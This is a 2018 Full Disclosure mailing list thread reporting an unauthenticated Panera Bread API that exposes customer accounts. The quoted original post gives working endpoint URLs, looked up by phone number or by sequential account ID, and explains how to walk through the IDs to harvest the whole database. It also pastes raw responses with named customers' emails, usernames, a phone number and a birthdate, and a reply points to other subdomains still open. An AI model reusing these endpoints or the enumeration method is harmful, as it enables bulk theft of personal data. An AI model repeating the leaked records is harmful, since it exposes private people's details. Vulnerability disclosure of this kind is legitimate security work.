Re: Massive Breach in Panera Bread

[John Menerick <john@syn.agency>]

They didn’t fix the other domains from resolving their weblogic / Hyperion site.   Try catering, etc.....

Sent from ProtonMail Mobile

On Tue, Apr 3, 2018 at 11:17, (RS) Tyler Schroder <redorhcs () redcoded com> wrote:

> A correction seems to be issued for both endpoints, POC links are returning "INVALID_SESSION". Might still be 
> breakable given some time, but something tells me they're getting a lot of free pentesting right now :) R. S. Tyler 
> Schroder -----Original Message----- From: Fulldisclosure [mailto:fulldisclosure-bounces () seclists org] On Behalf Of 
> Jack Beanstalk Sent: Monday, April 2, 2018 3:43 PM To: fulldisclosure () seclists org Subject: [FD] Massive Breach in 
> Panera Bread 7682200f0cd27a4f1a3c2301941d959aae7abf89136c38a4f1ded4d2bb7a67d7 I'd like to report a security 
> vulnerability in Panera Bread's web application. There is a publicly available, completely unauthenticated API 
> endpoint that allows anyone to access the following information about anyone who has ever signed up for an account to 
> order food from Panera Bread: 1. Username 2. First and last name 3. Email address 4. Phone number 5. Birthday 6. Last 
> four digits of saved credit card number 7. Saved home address 8. Social account integration information 9. Saved user 
> food preferences and dietary restrictions Here are the API endpoints which you can use to verify this information: 1. 
> https://delivery.panerabread.com/foundation-api/users/by-phone/9140000000 This returns the following JSON: 
> {"accounts": [{"username":"denys","name":"romona ruiz","cardNumber":"********6515"},{"username":"mhmulcahy () hotmail 
> com","name ":"Marie Mulcahy","cardNumber":"********5527"},{"username":"fenrny () msn com","name":"F 
> B","cardNumber":"********7921"},{"username":"sabooky1 () yahoo com","name":"C 
> Davis","cardNumber":"********7108"},{"username":"jorgeialcalde","name":"Jorg e 
> Alcalde","cardNumber":"********6129"},{"username":"ktennister37 () aol com","na me":"Kei 
> Kino","cardNumber":"********6061"},{"username":"gettingbetter812 () yahoo com", "name":"jan 
> jones","cardNumber":"********8950"},{"username":"kennny","name":"kenny 
> poteat","cardNumber":"********4412"},{"username":"angelo151","name":"angelo 
> ianello","cardNumber":"********8386"},{"username":"dblaperch () aol com","name" :"Deborah 
> LaPerch","cardNumber":"********5384"},{"username":"bagnoni1 () optonline net"," name":"sadie 
> bagnoni","cardNumber":"********5144"},{"username":"arsbreva () hotmail com","na me":"Marea 
> needle","cardNumber":"********7488"},{"username":"contessa1234","name":"CONT ESSA 
> SLEDGE","cardNumber":"********6702"},{"username":"lindapam","name":"elizabet h 
> forlenzo","cardNumber":"********7085"},{"username":"jue-95 () hotmail com","nam e":"juline 
> G","cardNumber":"********4220"},{"username":"gleuanter","name":"Leo 
> Zinder","cardNumber":"********9123"},{"username":"artlaura","name":"arthur 
> hanson","cardNumber":"********8139"},{"username":"dlongua","name":"denise 
> longua","cardNumber":"********0102"},{"username":"homestead19-86 () msn com","n ame":"Sandra 
> Baglione","cardNumber":"********6851"},{"username":"kilsha22","name":"kicia fulchek","cardNumber":"********2654"}]} 
> Note that you can look up usernames/email addresses for Panera Bread accounts if you know the target's phone number. 
> This returns the username/email address and last four digits of the saved credit card of every user who has ever 
> signed up with that phone number. 2. https://delivery.panerabread.com/foundation-api/users/uramp/7382194 This returns 
> the following JSON: {"customerId":7382194,"username":"abcascio () cox net","firstName":"Anthony","l 
> astName":"Cascio","loyalty":{"cardNumber":"603077990852"},"emails":[{"id":23 860763,"emailAddress":"abcascio () cox 
> net","emailType":"Personal","isDefault": true,"isOpt":true,"isVerified":true}],"phones":[{"id":18295989,"phoneNumber" 
> :"7032662951","phoneType":"Residential","countryCode":"1","extension":null," 
> name":null,"isSmsOpt":false,"isCallOpt":false,"isDefault":true,"isValid":tru 
> e,"smsPreferences":[{"programName":"Delivery","isOpt":false,"isOptPending":f 
> alse}]}],"isSmsGlobalOpt":false,"isEmailGlobalOpt":true,"isMobilePushOpt":fa 
> lse,"birthDate":{"birthDay":"25","birthMonth":"05","birthYear":"1948"},"user 
> Preferences":{"foodPreferences":[{"code":3,"displayName":"Low Fat"}],"gatherPreference":{"code":7,"displayName":"Meal 
> with family"}},"subscriptions":{"subscriptions":[{"subscriptionCode":1,"displayNa me":"Reward Reminders & Expiration 
> Alerts","isSubscribed":false,"tncVersion":null},{"subscriptionCode":2,"displ ayName":"Panera Bread Updates & Special 
> Offers","isSubscribed":false,"tncVersion":null}],"suppressors":[{"suppressio 
> nCode":1,"displayName":"Catering","isSuppressed":false},{"suppressionCode":2 
> ,"displayName":"CPG","isSuppressed":false}]},"addresses":[],"paymentOptions" 
> :{"creditCards":[],"payPals":[],"giftCards":[],"corporateCateringAccounts":[ 
> ]},"taxExemptions":null,"socialIntegration":null,"favoriteCafes":[]} In this context, "7382194" is the user's account 
> ID. Panera Bread uses sequential integers for account IDs, which means that if your goal is to gather as much 
> information as you can instead about someone, you can simply increment through the accounts and collect as much as 
> you'd like, up to and including the entire database. Hopefully they'll fix this if it gets enough attention. 
> _______________________________________________ Sent through the Full Disclosure mailing list 
> https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/ 
> _______________________________________________ Sent through the Full Disclosure mailing list 
> https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/